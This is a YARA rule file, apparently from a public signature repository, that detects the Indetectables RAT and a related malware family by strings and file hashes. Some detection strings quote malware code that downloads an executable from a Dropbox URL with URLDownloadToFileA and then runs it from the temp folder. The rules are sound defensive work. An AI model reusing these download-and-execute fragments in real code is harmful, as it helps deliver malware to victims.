Sneed-Reactivity/yara-Neo23x0/apt_indetectables_rat.yar

57 lines
2.4 KiB
Text
Raw Normal View History

/*
Yara Rule Set
Author: Florian Roth
Date: 2015-10-01
Identifier: Indetectables RAT
*/
rule Indetectables_RAT {
meta:
description = "Detects Indetectables RAT based on strings found in research by Paul Rascagneres & Ronan Mouchoux"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://www.sekoia.fr/blog/when-a-brazilian-string-smells-bad/"
date = "2015-10-01"
super_rule = 1
hash1 = "081905074c19d5e32fd41a24b4c512d8fd9d2c3a8b7382009e3ab920728c7105"
hash2 = "66306c2a55a3c17b350afaba76db7e91bfc835c0e90a42aa4cf59e4179b80229"
hash3 = "1fa810018f6dd169e46a62a4f77ae076f93a853bfc33c7cf96266772535f6801"
id = "f8322822-617c-50cf-8b64-60da3a202ca5"
strings:
$s1 = "Coded By M3" fullword wide
$s2 = "Stub Undetector M3" fullword wide
$s3 = "www.webmenegatti.com.br" wide
$s4 = "M3n3gatt1" fullword wide
$s5 = "TheMisterFUD" fullword wide
$s6 = "KillZoneKillZoneKill" fullword ascii
$s7 = "[[__M3_F_U_D_M3__]]$" fullword ascii
$s8 = "M3_F_U_D_M3" ascii
$s9 = "M3n3gatt1hack3r" fullword wide
$s10 = "M3n3gatt1hack3r" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 5000KB and 1 of them
}
rule BergSilva_Malware {
meta:
description = "Detects a malware from the same author as the Indetectables RAT"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
date = "2015-10-01"
super_rule = 1
hash1 = "00e175cbad629ee118d01c49c11f3d8b8840350d2dd6d16bd81e47ae926f641e"
hash2 = "6b4cbbee296e4a0e867302f783d25d276b888b1bf1dcab9170e205d276c22cfc"
id = "5f35aea6-1d80-594a-a6e0-8e8bb30bc358"
strings:
$x1 = "C:\\Users\\Berg Silva\\Desktop\\" wide
$x2 = "URLDownloadToFileA 0, \"https://dl.dropbox.com/u/105015858/nome.exe\", \"c:\\nome.exe\", 0, 0" fullword wide
$s1 = " Process.Start (Path.GetTempPath() & \"name\" & \".exe\") 'start server baixado" fullword wide
$s2 = "FileDelete(@TempDir & \"\\nome.exe\") ;Deleta o Arquivo para que possa ser executado normalmente" fullword wide
$s3 = " Lib \"\\WINDOWS\\system32\\UsEr32.dLl\"" fullword wide
$s4 = "$Directory = @TempDir & \"\\nome.exe\" ;Define a variavel" fullword wide
$s5 = "https://dl.dropbox.com/u/105015858" wide
condition:
uint16(0) == 0x5a4d and ( 1 of ($x*) or 2 of ($s*) )
}